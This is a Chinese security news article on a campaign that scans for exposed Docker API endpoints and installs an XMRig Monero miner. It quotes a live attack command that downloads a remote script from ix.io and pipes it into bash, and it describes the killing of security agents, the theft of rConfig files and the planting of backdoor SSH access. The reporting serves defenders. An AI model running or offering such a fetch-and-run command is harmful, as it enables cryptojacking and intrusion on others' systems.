黑客集团利用暴露在外的API端点劫持Docker系统

admin 2021年12月3日13:54:06cnnvd_news评论11 次浏览阅读模式

       某黑客组织目前正在互联网上进行大规模扫描,旨在寻找各类将API暴露在公开网络之上的Docker平台。

       通过扫描,黑客组织能够向这些暴露的Docker实例发出命令,从而在企业Docker实例当中部署加密货币矿工程序,最终神不知鬼不觉地利用他人算力为自己开采代币。

       本轮扫描始于今年11月24日,是周末,由于规模极为庞大,因此甫一启动即吸引到众多安全人士的关注。

       Bad Pockets公司联合创始人兼首席研究官Troy Mursch在采访中表示,“Bad Packets CTI API的用户应该很了解,针对暴露Docker实例的恶意活动并不是什么新鲜事物,而且发生频率很高。”

       他指出,“此次扫描的特别之处在于,其扫描规模极为夸张。单此一项,就值得我们投入精力调查攻击者到底想利用僵尸网络搞什么名堂。”

       作为本轮扫描行为的发现者,Mursch表示“亦有其他关注者指出,这样的规模绝不是那种脚本小子们的儿童把戏。恶意者在此轮扫描当中投入了大量精力,而且截至目前,我们还没有彻底搞清楚对方到底想干什么。”

此次随机大规模扫描已经检测出大量公开在公共互联网上的Docker API端点。此轮扫描利用Alpine Linux镜像创建一套容器。

       截至目前,能够确定的是,发动攻击的集团正在扫描超过59000个IP网络(网络块)以寻找暴露的Docker实例。

       在该集团发现暴露主机后,攻击者会利用该API端点启动一套Alpine Linux OS容器,进而执行以下命令:

       Chroot /mnt /bin/sh -c 'curl -sL4 http://ix.io/1XQa | bash;

       以上命令用于从攻击者服务器处下载并运行一份Bash脚本。此脚本会在目标设备上安装经典的XMRRig加密货币采矿程序。Mursch指出,此次活动刚刚启动两天,黑客方面已经股票市场出14.82枚门罗币(XMR),价值约为740美元

       此外,本轮恶意行动还附带防卫机制。

       Mursch在采访中指出,“虽然并非原创,但我们在活动中也观察到一种有趣的情况。攻击者通过下载自http://ix[.]io/1XQh的脚本制裁了已知监视代理程序并关闭了大量相关进程。

       查看这份脚本,能够发现黑客不仅在尝试禁用安全产品,同时也关闭掉了LSO进程——此进程可能被其他黑客竞争对手的加密货币采矿僵尸网络(例如DDG)所利用。

       此外,Mursch发现该恶意脚本还会扫描受感染主机以查找rConfig配置文件,对其进行窃取与加密,并将文件发送回黑客集团的命令与控制服务器。

       Sandfly Security公司创始人Craig H. Rowland则注意到,这批黑客会在成功入侵的容器当中创建后门账户,同时保留SSH密钥以待后续访问。如此一来,他们即可通过远程位置控制所有被感染的肉鸡目标。

       Mursch给出的建议是,各位运行Docker实例的用户及组织应立即检查自己是否在互联网上公开了AIP端点,如果有请立即将其关闭,而后关停一切无法识别的运行中容器。

  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月3日13:54:06
  • 转载请务必保留本文链接:http://zone.ci/archives/cnnvd/cnnvd_news/2021/12/03/788.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: